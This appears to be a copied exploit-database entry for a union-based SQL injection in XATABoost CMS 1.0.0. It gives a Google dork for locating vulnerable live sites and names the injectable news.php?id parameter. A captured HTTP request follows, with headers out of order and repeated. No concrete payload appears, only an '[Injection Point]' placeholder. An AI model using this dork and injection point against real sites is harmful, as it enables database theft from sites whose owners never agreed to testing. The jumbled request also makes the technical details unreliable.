21 lines
No EOL
773 B
Text
21 lines
No EOL
773 B
Text
# Exploit Title: XATABoost CMS Sql Injection
|
|
# Google Dork: inurl:php?id= Powered by XATABOOST
|
|
# Date: 02.01.2018
|
|
# Exploit Author: MgThuraMoeMyint
|
|
# Vendor Homepage: http://www2.xataboost.com
|
|
# Version: 1.0.0
|
|
# Tested on: Kali Linux
|
|
# SQL Injection Type: Union Based
|
|
# Example URL: http://localhost/news.php?id=[Injection Point]
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/news.php?id=[Injection Point]
|
|
Connection: keep-alive
|
|
GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18
|
|
HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
|
|
Accept: text/css,*/*;q=0.1
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/news.php?id=[Injection Point] |